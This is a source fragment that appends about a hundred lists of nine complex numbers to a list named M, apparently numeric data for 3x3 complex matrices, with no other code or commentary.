M.append([(32.1528712467+2.72436057123j),(-0.315604661305-0.706665937549j),(-1.04828354123+0.25302943286j),(0.62076731964-0.121279909757j),(31.7524482592+2.18439268223j),(0.0956815045032+0.634956756561j),(-0.132163181961+0.171718180499j),(0.938571631151+0.406042599017j),(32.0946804942+1.09124674653j),]) M.append([(59.5257137294-139.860886976j),(168.548089674+6.69231272081j),(-38.5261748592-3.97831441811j),(104.729073095-30.6288895678j),(98.1318705926+127.085294549j),(4.62018292328-29.5286563553j),(-93.5672107435-55.8170360026j),(95.5834765412-78.7186420874j),(81.342415678+18.775592427j),]) M.append([(67.7334000757-26.282593434j),(51.8006835058+53.2659305143j),(-10.803807886-121.037554157j),(-33.4467782939-25.7764169706j),(149.478384615+46.3431273227j),(-3.33389092365-91.024728092j),(-23.3949976829+20.9947939943j),(39.0173268098-20.6542231615j),(39.788215309-14.0605338887j),]) M.append([(111.111293022-2.86158134556j),(5.41907190141+7.08886272591j),(-6.68161292033+7.69477425119j),(7.39591231187+0.900133441995j),(99.17616716+3.93056871032j),(-2.75950659936-9.48104484877j),(-5.14304648287-0.155721645151j),(4.5184033797-4.96141427493j),(116.712539818+4.93101263524j),]) M.append([(128.628032406-57.8887403992j),(14.7958541185+18.9529474217j),(81.5827009736-29.8259005217j),(0.47818049675-78.7509001944j),(101.590862526+30.7235046407j),(80.2079461536-69.025456166j),(-34.9024562418+78.6198901668j),(-7.1132467359-22.515450695j),(-5.21889493197+33.1652357586j),]) M.append([(104.766558556+8.84086728309j),(5.78746004507-9.8792501985j),(-2.97357601975-19.1056237828j),(-24.3502585663+5.4740875733j),(85.2995720689+16.7097775322j),(26.2897598345+15.7342327355j),(22.2645283345+7.22179569643j),(16.9970810564-12.2170456947j),(78.9338693752-19.5506448153j),]) M.append([(86.7133368646+9.62535481449j),(-9.04069162834-4.59310447662j),(24.0906252333+14.4267628643j),(1.53439066279+0.313045799793j),(103.573328953+4.26511868284j),(-4.90962973363+6.82950469349j),(2.64852136205-21.541202327j),(10.096045878-14.0708537891j),(53.7133341822-7.89047349733j),]) M.append([(98.0459098017+0.972353715725j),(2.8810425174-5.30722908541j),(3.79361969838+3.79079817726j),(-0.685017219056-0.31381983717j),(104.950570481-0.410477187064j),(3.64685061791+3.39233862473j),(-1.09309779472-3.57088461479j),(2.68643055228-2.98068808098j),(106.003519717+5.43812347134j),]) M.append([(56.3380092745-0.857188296015j),(1.66662743816+4.45785931286j),(-5.87519389067-2.42988812049j),(8.47785472034-5.57431421996j),(52.0834183841+0.626803308144j),(7.8116661283-6.94690905347j),(-6.94580470983+1.76432016193j),(4.97446295574+2.70662659458j),(54.5785723414+6.23038498787j),]) M.append([(61.8128697165+1.00101164094j),(-22.370594496-33.7324878443j),(6.96684732104+32.3580730374j),(-19.6329024773-1.20722848563j),(77.4630272701-17.7113802013j),(1.83713596272+23.2441312118j),(-24.7996452198+11.5104460048j),(-32.4254847304-18.6861158132j),(115.724103013+22.7103685604j),]) M.append([(19.1216876818+60.1029831891j),(-3.72214948466+44.300562854j),(-7.85843839932-44.7568147449j),(84.2254050137-89.2417639979j),(89.4153246751-55.4933187789j),(-30.8544729152+75.1196451427j),(-18.5903753913+2.58743853961j),(-14.6734840234-5.98370131319j),(45.4629876431+1.39033558984j),]) M.append([(104.898103294+14.5416260162j),(21.0759812619-6.52852264801j),(6.92518395684+7.95347903787j),(3.24830359251+31.0041623946j),(134.241107718-30.6659419769j),(17.5063176199+1.07000591055j),(-35.6591981922-25.0076491065j),(21.4135670857+52.3688720106j),(97.8607889884+22.1243159607j),]) M.append([(111.016213123+1.70948054205j),(-3.41021356036-4.07564018552j),(-2.30465371866-0.115622368271j),(4.52167395095+5.36031979968j),(107.520046625-3.4687176159j),(-1.36580291698-7.18033951324j),(0.595948554408-4.41489738013j),(-7.39333658181+7.60343735505j),(106.463740251+7.75923707385j),]) M.append([(114.941131966+1.15751190604j),(-0.375357486702-0.415770088027j),(0.353194501233+0.886184096319j),(3.3143688509-0.340528166465j),(115.532691225+3.21237040405j),(-0.113942402999-1.12171649091j),(1.46769489436-1.77609432595j),(1.12410894767+0.288632293682j),(114.526176809+1.6301176899j),]) M.append([(38.4379918535+15.5605289116j),(-3.71177876502+23.4745992374j),(-18.9474817549-4.69126655648j),(7.5146168265-12.5719484118j),(53.2430324302-15.3676345943j),(15.9889035519+5.84479728605j),(4.10163907182-4.66344440727j),(10.3956328775-8.43216829366j),(46.3189757163+5.80710568263j),]) M.append([(31.7908372623+2.6587908875j),(-0.315585254715-0.829413511321j),(0.344159273603-0.125280000195j),(0.303554695217-0.184256824467j),(31.7739574638+2.10725941937j),(0.542221119336-0.825433025049j),(0.517122738303+0.387853073721j),(-0.860726960805-0.166201743106j),(32.4352052739+1.23394969313j),]) M.append([(32.270200716+2.03347152613j),(0.198533099515-0.760529194443j),(-0.573769774475+0.511693555567j),(-0.21309215023-0.205612945509j),(32.3536014363+2.66049758581j),(-0.167033472219-0.734732944401j),(0.356117059909+0.520255818544j),(0.929120838844-0.0131816198737j),(31.3761978477+1.30603088806j),]) M.append([(32.0586988232+2.37925616195j),(1.23302001138-0.240924365954j),(-0.561561244259-0.0488198275023j),(-0.321615970618+0.270815568606j),(31.3797221903+2.53852534491j),(0.201182714415+0.236269431053j),(0.0753118217219+0.359050963882j),(0.776707279783+2.17497676462j),(32.5615789865+1.08221849314j),]) M.append([(32.1820331118+1.05963220598j),(-0.0585807812172+0.476641480435j),(0.1243822+0.590610984957j),(0.606262984111+1.47018546745j),(31.7668765373+1.60249834994j),(-1.75776426952-0.422453317918j),(0.803597560165-0.892310097975j),(-0.186443866677+0.361297855621j),(32.0510903509+3.33786944408j),]) M.append([(115.248683995+1.39086254454j),(-0.283056668314-0.171895437915j),(-0.0252562502748-0.48797047337j),(-1.21074641042+0.148643573791j),(115.03010955+1.75322865886j),(0.497341100633-0.187106232202j),(0.452856564616-0.962210126547j),(1.47932593406-0.593239845448j),(114.721206455+2.85590879661j),]) M.append([(24.5671858334-14.5447830614j),(8.3846357469-0.828862827839j),(26.298088274-20.8477663451j),(22.9280261763-55.0722265906j),(69.8731542803+9.679787413j),(32.6719397393+38.9178317986j),(-16.806343047-53.7764473951j),(16.1502274885-3.68686906904j),(108.559659886+10.8649956484j),]) M.append([(105.894714405+11.7671475264j),(1.75473561657-2.10856999445j),(5.65406518217-8.97471148502j),(-3.75649936016+7.7533357829j),(116.09841716-6.99367211519j),(8.28894208823-6.05770233813j),(62.7262560011-35.5389044668j),(-60.5423284684+42.1438893319j),(36.006868435+1.2265245888j),]) M.append([(104.868490406-0.0107061227646j),(1.32422082456+4.87824220525j),(-3.64635102402+1.2163607979j),(2.54995180408+2.27712768989j),(114.798666037+2.13366763992j),(-2.87912585384-1.16130234862j),(-4.42768493925+1.63056667873j),(0.406794372154+2.12293361899j),(111.332843557+3.87703848285j),]) M.append([(96.8829594945+8.61397256488j),(-16.3843670837+5.18193485871j),(-13.2281883747+17.8123054125j),(-39.2885257778+4.09164951993j),(64.918920495+4.08812906411j),(-47.074822275+32.7235100084j),(-4.19797608857-8.13817986268j),(-3.8937858675-11.8507186271j),(103.198120011-6.70210162898j),]) M.append([(105.120053327+0.567627903763j),(-0.981838087163-2.30835348184j),(-1.67406734988-1.00876524638j),(9.12761483423+5.54217636266j),(116.96984686+4.78714811293j),(3.17087147652+5.88375470052j),(-12.2190835435+0.345189583942j),(-4.2885994976-3.25321829623j),(104.910099814+0.645223983309j),]) M.append([(138.885851077-84.029969177j),(83.0002385619+38.6872411263j),(-107.653880066+117.665602873j),(-12.152450347+83.4751624064j),(-7.24018774843+8.60614213804j),(17.7719137012-110.398099476j),(-12.7924525185-61.5913404126j),(58.7894381815-26.7708930511j),(93.3543366719+81.423827039j),]) M.append([(94.872925228-0.147099475682j),(-9.54563869836-10.8705844644j),(-6.96819203593-4.09438375219j),(-10.8780920574+10.0749789332j),(95.6195971712+0.884154400314j),(-2.50535602763+5.78106624189j),(-18.8622392365-0.297939747096j),(-1.53749824941-1.49146451208j),(78.5074776008+5.26294507537j),]) M.append([(95.3624857005-51.2259869711j),(-20.9283040934-38.7918361681j),(-13.5030422292+26.9694157748j),(8.02637458807-1.46863941799j),(94.3745086779-12.5268161526j),(-10.7317112198+1.45837832169j),(-19.0169944143-143.643328669j),(-59.364276369-104.543452227j),(63.2630056216+69.7528031237j),]) M.append([(101.301917665+2.94657191158j),(-0.987079768045-2.18140924948j),(4.52641469534-0.224200247353j),(-3.00298514128-8.69675764134j),(103.596895426+5.30742600646j),(-7.67409946594+0.497402730283j),(8.64267094242-0.700332401131j),(-2.70302295665+1.31967739524j),(101.101186909-2.25399791804j),]) M.append([(40.9065193416+0.290988560284j),(0.00910382576079+0.159006204139j),(0.731457015994+0.0784948902128j),(1.77094647977-0.771310874666j),(40.6960140775+1.66035255857j),(0.0587801323556+1.2991053127j),(2.51960884587-0.294675877006j),(-1.00807064824-0.416711231521j),(41.3974665809+4.04865888114j),]) M.append([(-12.2821617538-7.15791477064j),(13.4564189784+39.5082586951j),(-67.2577008591-78.53742762j),(62.3874578884+4.41775658875j),(95.7658141401-19.2346374955j),(39.1993521526+44.5153834455j),(67.9850396484-22.3328603858j),(-7.78787625263-28.382130625j),(152.516347614+32.3925522662j),]) M.append([(-10.29590795+104.715694854j),(-125.26619908+65.3609938096j),(64.9525285783-173.076753426j),(39.1232884779-61.5356716218j),(152.946256736-36.9424288502j),(-16.0677488321+81.5796594002j),(-10.1015629598+54.5307184998j),(-25.7191185253+43.5392469038j),(88.3496512139-61.7732660039j),]) M.append([(91.1010015761+16.0064622162j),(17.8854837007-11.863494818j),(-6.70350277353-18.0135791765j),(-13.7202861362+39.0085853967j),(123.09267168-29.3995123089j),(-26.508725311-14.3012381899j),(21.8130223772-8.34929329994j),(-18.0230547869+8.51870592518j),(116.806326743+19.3930500927j),]) M.append([(109.699854825+3.71227494861j),(1.90179651008-2.25469413514j),(-1.09649621512-1.16167481419j),(-1.72217331462+2.56885129746j),(114.989652192+0.235644989322j),(0.24362310918+0.3459170278j),(-1.41812295099-3.43471321921j),(1.61024210887+1.02549226859j),(116.310492983+2.05208006207j),]) M.append([(107.203967946+17.754590469j),(34.3791372364+18.7242484077j),(17.7800938851-14.32592554j),(-34.9848983289+11.3971139594j),(29.0343741623+3.30672214213j),(1.49244232478+8.51899455234j),(74.5551609783+23.2611981117j),(56.6790668527+33.4662529344j),(81.7616578922-15.0613126111j),]) M.append([(33.6403910861+1.03037965399j),(-0.0090396481578+1.50141072657j),(-2.53956488956+0.324343944145j),(1.15424044206+0.743201091495j),(31.2071913442+3.01427345349j),(-1.08647965168-1.2155559593j),(-0.663210694075+0.482190825768j),(0.229473393928-0.403570081851j),(33.1524175697+1.95534689252j),]) M.append([(45.9833827376+9.47884636412j),(34.6206926999+7.29521226376j),(-4.64359713344+20.9178724414j),(12.2449683441-7.77198604694j),(53.3748837449-22.0485959579j),(14.2961397266+13.109867509j),(23.2129316254-28.9129084615j),(28.9625585416-77.0252630288j),(78.6417335175+18.5697495938j),]) M.append([(103.007141508+19.3436743264j),(10.3738621288-23.468906896j),(9.20675327841-14.2779432231j),(-39.9271990867+20.3657467841j),(156.768032525-34.6707386168j),(29.9810931883-20.987562471j),(53.1747025205-16.8677968652j),(-58.1105928861+36.3673666006j),(74.2248259666+21.3270642904j),]) M.append([(113.556625362-76.2406932875j),(-51.5356702833+9.53932716121j),(-81.8537648216+68.2494259481j),(-51.9871257345-86.0307247559j),(60.8759062771+49.3098165687j),(-35.1537398413+131.4486392j),(-1.2213135793-31.8734051999j),(-23.2957163587+6.85053992757j),(89.5674683611+32.9308767188j),]) M.append([(114.528716675+1.21903706136j),(0.36774731661+0.500947188773j),(2.40629481755-0.402474583863j),(1.44130095874-0.115474173237j),(114.628552469+1.76141321478j),(-1.0873360343+2.09920530047j),(0.900982965705-1.0089935458j),(0.318337499656+0.80299989543j),(115.842730856+3.01954972386j),]) M.append([(30.0851946286-25.217236829j),(38.0851673245-31.6624847197j),(-2.02939926754-47.5609251904j),(11.0947731713-8.22056447068j),(113.981913542+0.0227803189811j),(16.6645971968+10.4608969321j),(32.6247031177+4.94829716093j),(1.26306755621+26.2695288541j),(98.9328918289+31.19445651j),]) M.append([(86.793467548+28.3162291362j),(-46.4603763794-23.9380930376j),(50.7458975546-11.4416278083j),(9.22671652692-8.23724792534j),(103.381822082+29.5988451647j),(-24.2018168116-19.5536387953j),(41.6341323222-13.0439872505j),(-3.2258861743+74.8404715303j),(45.8247103698-51.9150743008j),]) M.append([(33.6571963795-19.9042332152j),(30.2059223442+17.4735221737j),(31.7039360384+28.6334378178j),(64.0767092579+6.90849056672j),(23.4529555708+70.313287684j),(-1.17757176922+86.6111127212j),(-29.660008003-49.6466875688j),(41.6891989618-46.3825773732j),(71.8898480497-44.4090544688j),]) M.append([(118.015784754+2.70982498348j),(0.354564847335+2.12987696956j),(-2.5370874046-2.79357516084j),(-1.48664175799-0.728873661831j),(115.844140565+0.913697576946j),(0.381277682634+2.77451062025j),(-0.327476094731+0.970647040694j),(-0.665756012986-1.5372608403j),(118.14007468+2.37647743957j),]) M.append([(74.9348134586-12.6361599376j),(-19.620486023-1.68120158959j),(2.37505748959+38.7786132082j),(-14.8985023413+10.5364629798j),(107.981637328+16.7312112832j),(19.0369251167+15.6463224077j),(-0.642520727619-9.46029104755j),(-3.83197088688-10.5221868693j),(101.083549214+1.90494865436j),]) M.append([(104.639891389+1.45745076778j),(5.75954255987+19.5542221361j),(4.00483990168-1.76143511316j),(8.93111035396-18.0879552732j),(99.0710596522+3.07158058152j),(3.88380998516+0.651930095601j),(-18.9305239259-17.4555658519j),(13.5651060659-22.5853431281j),(78.2890489586+1.4709686507j),]) M.append([(89.3704125417+14.6390416561j),(0.234889086584-11.1969026523j),(0.547656469333+10.3260095461j),(-9.41698970923+1.33384873328j),(104.280274786-2.4806341364j),(-0.26855487813-1.02191637858j),(11.3238218749-14.2715150665j),(-0.699255481384+13.3060335356j),(104.349312672-6.15840751967j),]) M.append([(-58.9138895604-206.344073183j),(283.828607265-4.38405206079j),(60.2367988353-104.687242396j),(47.5649115317-172.329628614j),(219.767286897+154.656929485j),(81.2791158269-9.91113453715j),(72.2009655628+146.503648928j),(-174.729337578-31.7846874805j),(50.1466026637+57.6871436976j),]) M.append([(110.63236471-2.40670186607j),(-7.14813415596+1.46221633778j),(-1.83098911082+0.536109477756j),(-8.02835742383-5.47142355306j),(110.526585821+5.03786928491j),(-4.16194682021+2.13004803997j),(-2.34146624104+3.4095074551j),(0.529640553261+7.64302310613j),(115.841049469+3.36883258116j),]) M.append([(101.393902234+1.15195511734j),(3.11739825923+1.084383259j),(-0.149847481951-1.11321439438j),(4.17460681748+0.322792122801j),(103.299605801-1.74445230124j),(-5.86712419804-2.01440454978j),(-2.53123236347+0.0390969705917j),(-5.8079890418+5.0923537369j),(105.306491965+6.59249718391j),]) M.append([(53.363562609-27.570241007j),(-33.9694125273-45.6707008456j),(11.540150631+56.1878281918j),(-7.07858226306+1.32649172707j),(93.5831651875+0.0261802205337j),(5.64928505339+3.93125421671j),(-32.3857339219-10.5148150983j),(-26.428820168-23.2596542342j),(116.053272203+33.5440607865j),]) M.append([(132.580270058-8.0412788676j),(16.7169820081+7.36991233386j),(-40.340167962-14.1260774924j),(-20.3031221751-13.9539129256j),(113.66428709-15.7798873419j),(-0.163709715586+44.9782974946j),(-7.17731591039-19.0193210357j),(7.13320304268-10.5168510599j),(90.7554428525+29.8211662095j),]) M.append([(109.585807824+3.27207234638j),(7.57074996101-4.47421467433j),(8.83209383339+1.2900490261j),(-0.295421997439+4.39416014189j),(113.509775137-4.71509649989j),(3.28381327781-5.88869872807j),(-3.3974274303-1.98701322363j),(5.73090287423+4.2781065492j),(115.904417039+7.44302415351j),]) M.append([(-110.308394402-198.592815673j),(157.5486013-34.9306156033j),(100.957460156+235.915511266j),(164.992198753-22.582723881j),(72.9361549595+80.2204211156j),(-135.164891853-42.2491749652j),(-235.020503744-49.2468247401j),(93.7621644689-87.4374469802j),(277.372239443+124.372394557j),]) M.append([(82.7329765594+19.7986204893j),(-2.29457642662+5.37967164388j),(-38.0104784221+15.7455693574j),(-40.2015349635-25.0437592718j),(107.548578888+0.70381259358j),(-38.3581773535-34.3365358829j),(24.7549940002-20.6699797956j),(3.66301202734-5.03688325025j),(146.718444553-14.5024330829j),]) M.append([(105.679168738+1.86904510427j),(1.50979634086-2.6738506501j),(-9.38002870948+1.4021038938j),(-6.35046183909+1.5182062783j),(98.4845363482+7.5075069744j),(13.7293111282-3.89218982668j),(-4.08783071382+0.376434473866j),(0.951697510324+2.56120885492j),(105.836294914-3.37655207867j),]) M.append([(52.7158789081+6.43423124901j),(-33.0614709189+11.739500428j),(-33.5682683322+21.1027320513j),(-5.95766781584+10.5808168858j),(79.6814307903+8.2849436165j),(19.6466962724+5.83322848614j),(-2.50358004622-14.0728036448j),(14.9350686145-4.236655734j),(72.6026903016-8.71917486551j),]) M.append([(76.0247018473-12.5947467965j),(-5.13655932444+6.7898159756j),(-31.2495690735+2.2699081238j),(20.8566833393-0.767346884446j),(42.7233442775+5.66614121864j),(-23.9276553853-29.3623721393j),(-4.65995277734-10.4677605944j),(-3.47538948419+6.94483952372j),(53.2519538751+12.9286055779j),]) M.append([(93.6784758361+2.86622147035j),(1.24883955192+0.6288015403j),(-1.47648078503+0.0624027656808j),(-0.382105508047-2.51146650631j),(93.166398283+1.78563107999j),(-1.06951718757+3.03750125802j),(2.02505068148-0.422106989037j),(0.544403011674+1.01435483701j),(89.1551258809+1.34814744967j),]) M.append([(55.5027785418-0.30673057668j),(-8.8567880599+43.0775942459j),(8.24267577155+17.0162515288j),(19.4088807129-53.7415873332j),(76.6197193082+51.8802528737j),(45.1337558956+22.5846636563j),(-54.9043351655+9.99051182438j),(21.4757499163-81.9378313739j),(21.8775021499-45.573522297j),]) M.append([(117.703067473+1.23969143459j),(-5.55195843694+0.486789975966j),(-2.71758413233-4.8494115232j),(-15.6290747175-15.3980753672j),(121.951970736+14.9347516131j),(-4.0080678013+20.8596935866j),(22.8583170198-12.3872985602j),(-18.0530195277+7.65122259482j),(87.3449617914-10.1744430477j),]) M.append([(113.155487931-2.74644555285j),(2.4895400921+5.0095924647j),(2.07729644872+3.6244228633j),(-2.45689206611-20.5330343408j),(129.599664028+6.59525299069j),(16.3811178569+6.23067896496j),(15.2390075229+25.3876980819j),(-28.436503776+3.20125332967j),(84.2448480415+2.15119256216j),]) M.append([(54.7832206074-15.2754861725j),(9.8379040102-18.0094037198j),(-15.07551486-14.323465986j),(78.5531574596+32.9132854523j),(82.2473098771+32.4972373891j),(29.4718694484+30.7868783745j),(46.3836841577-51.4376407024j),(14.5425407868+28.8920371836j),(142.969469515-11.2217512166j),]) M.append([(84.5406036313+7.64963802675j),(-16.446301514+5.4844381268j),(8.08446487347+17.3204500921j),(-67.3509697488+7.84360567091j),(71.8957733101+9.25186341914j),(18.3784908376+50.4921791847j),(16.2435945331-0.197888565745j),(12.0315767072-2.41224585156j),(109.563623059-10.9015014459j),]) M.append([(82.1592727541+18.1952192215j),(29.194740109-18.8367628708j),(31.2380855603-39.2908367006j),(0.847122721883-35.6693644206j),(98.2673254702+49.8400036245j),(17.3113065386+67.9600264418j),(13.7852514474+34.8778019449j),(-2.99966936698-50.0420224447j),(68.5734017757-62.035222846j),]) M.append([(66.6107559463+24.7375964526j),(-21.8320629488-8.60518633262j),(5.19243932138-28.2902657861j),(-9.21169014344+16.6047749075j),(100.760389119+3.79835937359j),(-5.24687126892-11.1291639246j),(-14.4390119969+48.0708877263j),(-20.9155799054+10.7080447698j),(91.6288549347-22.5359558262j),]) M.append([(117.006019928+1.14127940937j),(2.64367949471+2.78507139514j),(-3.04661884046-2.48695045096j),(-0.472103263458+0.161529501547j),(115.109276795+2.6886925811j),(-0.46098208395-0.287198710367j),(-0.0272398308372+1.71704988578j),(-4.18918466739-1.44246208049j),(119.884703277+2.17002800953j),]) M.append([(77.1874055528-21.2533714054j),(-51.2170881484+4.32584093745j),(11.8374899157-6.35097861618j),(-31.4443130377-12.2382459092j),(67.8697838712+34.6318508562j),(-9.07602732643-5.71460911856j),(30.9138459483-35.6924733807j),(-55.7591112528+20.3733933742j),(52.942810576-7.37847945082j),]) M.append([(46.9238058268+3.69924070707j),(-3.46208916696-2.07351484017j),(1.40774496382+3.04994880653j),(-0.0958594963576+2.36556929547j),(45.560590851+1.63583864368j),(0.946411790039-0.603928970971j),(1.40033860413-2.98525173628j),(2.87045620353+4.52193980717j),(45.5156033221+0.664920649259j),]) M.append([(53.6930829994+0.30488522894j),(9.40760565268-2.19537185177j),(-1.35180283926+1.53784679938j),(-1.73158429271+0.233636371459j),(43.5847483393+2.09176371331j),(0.985359611088-0.84174967349j),(13.2227352313+5.85262620937j),(16.8172753699+7.56888035999j),(40.7221686613+3.60335105775j),]) M.append([(45.4021818329-60.9675751904j),(9.8903222778+32.3310654121j),(-19.9032758706+86.8920000339j),(-76.6077114539-15.3674754449j),(136.300226106+26.4835191395j),(17.2237306908+73.021036149j),(-5.73689752966-74.2841240127j),(-18.5819432926+22.9272255473j),(58.2975920607+40.484056051j),]) M.append([(115.513830639+1.2391339041j),(-0.348279076806-0.133921651237j),(0.411517045398+1.48253416246j),(0.912816467521-1.47857302509j),(114.026104234+2.47538788394j),(0.853309695395+2.47053414379j),(1.12101973522+0.476237356529j),(-0.852789718655-0.493604957812j),(115.460065127+2.28547821196j),]) M.append([(41.7452191231-2.28436748547j),(-21.0168772127-5.53828684739j),(17.1817656233-13.1016831297j),(0.878678179327+4.98981456909j),(55.6634165682-6.93149595829j),(-2.50149950972+13.807831882j),(4.16744574211+6.45308363318j),(11.7769275804-8.55788723726j),(40.5913643088+15.2158634438j),]) M.append([(30.3588741934+0.230687508473j),(0.593054309981+0.245045083017j),(2.71063750804-1.14765846434j),(-1.6896893132-0.103572359511j),(32.8312606011+1.71847016966j),(0.839563549761-1.87206522114j),(0.832849375243-2.78743616411j),(-0.939489994783+0.948127136057j),(34.8098652056+4.05084232187j),]) M.append([(99.7022210586+53.1698290943j),(-40.9443063679+102.813343861j),(-93.9867439499+87.0348209843j),(-34.5226448246+0.425750887335j),(39.3749372657-14.1603860755j),(-67.3074407817-54.2547403079j),(-14.1766054411-3.07620009161j),(-33.4483864175-18.8758315658j),(83.9228416757-33.0094430188j),]) M.append([(72.6891596349+12.633747134j),(8.93982717203+7.12988435842j),(36.1371925497+23.0694381923j),(-5.47616022339+16.2283252436j),(115.329295811-0.693022214276j),(16.1199102368-13.4522650261j),(36.0034366273-26.612364156j),(-10.4180877455-2.58158273695j),(67.9815445537-5.94072491971j),]) M.append([(69.4735564754+9.05395125907j),(-24.8701150322-19.9287353029j),(28.2641536338-14.8189756527j),(-25.2320083726+15.3798514756j),(86.734910087-1.13051017402j),(16.2344305392-15.7169276918j),(17.6248008459+9.22147669458j),(4.86533751201+10.616063629j),(90.7915334376-1.92344108505j),]) M.append([(39.2280682068+19.7097783197j),(58.6691781934-9.93891889405j),(-27.8641796458+11.1367576131j),(25.3166496537+6.36328306649j),(78.6434122394-16.0057843555j),(20.319661098-2.64084261754j),(33.5293469881-6.91175057337j),(-17.2861127534+0.783492353586j),(125.128519554+2.29600603584j),]) M.append([(99.8392602218+3.39758151422j),(-3.55603798567+3.4054964505j),(-6.04188323864+7.45089818767j),(0.183016366338+0.942988566296j),(103.101256641+5.31614467761j),(2.43760477068+4.65944280288j),(1.40498823595+0.574662910105j),(6.81419601456-1.20810664903j),(111.059483137-2.71372619184j),]) M.append([(65.3168285177+8.59950393002j),(41.40530931+54.5247517818j),(57.0771193592+84.1025125847j),(18.2834310292-7.29677873092j),(87.1586729765-27.3224087119j),(-20.7485352047-36.1603427575j),(0.482648643583-3.88906554213j),(6.64835826382+14.1397392828j),(97.5244985058+24.7229047819j),]) M.append([(119.581620086+31.1097096225j),(29.5196235422-16.4836713582j),(14.2715330253+3.4032310503j),(19.4152849686-27.3893883771j),(76.9931096821-6.45904294275j),(-9.64181484531-14.4229138849j),(57.3394792059+41.6906974771j),(17.3901521382-81.1390657553j),(146.425270232-18.6506666797j),]) M.append([(105.151280727+12.963925889j),(-3.82830417881+16.7570914938j),(-2.80097507087+12.9533636702j),(-30.6749775767+8.93422670983j),(75.5924752099+12.1874247972j),(-23.1037950373+15.9809690337j),(-35.8249732483-47.8508804715j),(-15.5639301973-31.8469548522j),(75.2562440626-19.1513506862j),]) M.append([(43.0605014091-6.65196332111j),(9.76933343968-14.8591399743j),(8.00129304097-13.7251155802j),(20.74755573-7.60963494919j),(44.6075974995+23.7267746756j),(20.4532476332+28.4125782784j),(-2.63358102638+27.9834679505j),(-5.3301842091-9.16030662909j),(12.3319010914-11.0748113545j),]) M.append([(67.7034230403-2.26527568681j),(-16.8735695757+48.4406713838j),(-37.7021988202+6.84281168662j),(-7.61822179673-24.0658087886j),(54.4052365301+13.8278800316j),(-29.9918592823-1.90669547826j),(5.33674667609+4.52093216792j),(0.735410615131-19.4136970667j),(103.89134043-5.56260434481j),]) M.append([(82.2543541399-11.758015413j),(12.3237247636-10.8007279322j),(-23.9514893769-9.08898061574j),(29.2492691964-7.87023456677j),(73.785539234+12.6499459274j),(30.1484203678-8.52459124636j),(-3.13668865208+12.7604335841j),(-4.69287492374+20.933178563j),(109.960106626+5.10806948562j),]) M.append([(59.6625615199-31.6678402592j),(-26.3226499588-19.0908058436j),(-2.87493373155-27.7766089767j),(-28.5081910804+48.348899055j),(59.7068627821+21.5443239885j),(13.6246431988+23.8557999939j),(-17.9101752961+25.7980801328j),(20.43247206+27.7217023107j),(15.6305756981+16.1235162707j),]) M.append([(330.130456507-77.7792599777j),(237.417722281-118.279238363j),(207.493691482+48.5316686206j),(-145.77406984-91.3203001458j),(-75.6056031045-76.7286692031j),(-67.1038825481-134.475070766j),(-13.3833906121+221.988190228j),(13.0848437511+240.574432926j),(-16.5248534021+160.507929181j),]) M.append([(109.293292827+0.146854253843j),(-7.33546718033-2.4476989288j),(-0.120821520274-4.35845350782j),(-7.08353928822-3.83921944562j),(108.027000009+7.54205644636j),(0.515749080381+5.36063122743j),(6.26541232048-1.23790441852j),(-3.53402089298-4.65255981496j),(104.679707164-1.6889107002j),]) M.append([(100.543397631+3.92049335194j),(9.97770055836+4.20705413319j),(8.56607770037-9.4037698206j),(-1.15366164555-0.153557789541j),(101.630939823+3.47012971561j),(2.73786217877-4.11956287411j),(-0.21362775021+2.56054590455j),(4.49061359735+6.15918966576j),(104.825662546-1.39062306755j),]) M.append([(40.4275611897-15.3826293461j),(-47.7094723189-6.73980855313j),(-61.2120164171+72.7833401205j),(-16.650161096+22.3544703066j),(100.317379616+17.4605095362j),(17.5654614172+33.9792910041j),(1.8030529791+7.09485603719j),(1.26037423077+3.7624791858j),(119.255059194+3.92211980993j),]) M.append([(126.32426113-11.9763496852j),(15.5141090008+8.06938262422j),(7.13288299251-23.3165259373j),(-39.6056573505-19.5427866886j),(107.925626215-32.9982619775j),(-47.9670379855+9.28185676146j),(-49.5403182359+17.0289314918j),(-32.1907682039-32.9575696443j),(73.7501126544+50.9746116627j),]) M.append([(29.8855056868-1.63999084229j),(7.05064347912-6.63297587415j),(-0.389811600545+4.88132026015j),(5.69383614206+12.7305234545j),(25.0774945421+10.7514149747j),(-11.020062136-13.6960976345j),(5.72130298342+5.17631701336j),(-5.02432228853+11.1692867312j),(28.0369997711-3.11142413242j),]) M.append([(-20.6784574895-33.3962847157j),(-61.6308450518+9.88965746713j),(-12.2249802154-50.8653669587j),(22.7014285308+20.5005225349j),(74.2137000598+17.3396749876j),(3.81233342155+23.5057718112j),(78.8150449148-37.643319706j),(39.9430875118-68.3625515364j),(102.46475743+22.0566097281j),]) M.append([(81.363056101+49.6487092468j),(3.80360710317-16.3060677321j),(4.35751433624-32.146798012j),(11.2449860255+59.6824680878j),(103.950607385-12.6220211994j),(-19.5928489648-30.0786842645j),(-6.80242288646+60.8475653198j),(-5.16617210566-17.2818430058j),(100.686336514-31.0266880474j),]) M.append([(45.0506041335-6.20948055103j),(-25.7852124126-21.533223234j),(-26.1815387558-6.51597481879j),(-25.7158300619+2.5349116747j),(86.8887779441+5.27672291728j),(-8.16156007564-3.01356560814j),(26.7164694507+18.8838142287j),(11.1772483472+33.0215046599j),(117.060617922+6.93275763375j),]) M.append([(115.587652362+2.38773108096j),(-1.71438998139-0.919567861791j),(1.16780619244-1.12212015299j),(-0.312524399313+1.52997580543j),(118.99516054+3.2299431478j),(-3.21610625729+2.04853762247j),(-0.908353169344-1.17966414153j),(-2.49070240399-0.486542671448j),(117.417187098+0.382325771248j),]) M.append([(76.698898015+4.38813639066j),(14.2423758429-12.0379362415j),(-9.2458370173-13.800804222j),(38.4364756687+48.4958028252j),(53.2220655841-22.3987105715j),(-49.1628971553+36.4606728053j),(19.1001263826-28.5656737692j),(-13.9337776756+29.3548769435j),(126.079036401+24.0105741809j),]) M.append([(23.1203019509+20.0975911608j),(38.5331558362+55.2435237863j),(-80.0364765907-122.612002392j),(9.27518522344+24.0470170228j),(106.298416919-14.3903292465j),(-137.628654459+33.4361798924j),(-0.928362581238-6.03734973035j),(-12.8314382101+1.23662464486j),(65.58128113+0.292738085747j),]) M.append([(37.6976896987+8.35099492372j),(-11.4932962668-36.7433704347j),(-1.94946918971+31.2632692235j),(-1.5601688403+1.67183790946j),(71.0497806484-5.95662080079j),(-13.2993453331-1.77187152074j),(6.80466055772+3.56755822777j),(-36.2982700198+8.03992392759j),(73.2525296529+3.60562587706j),]) 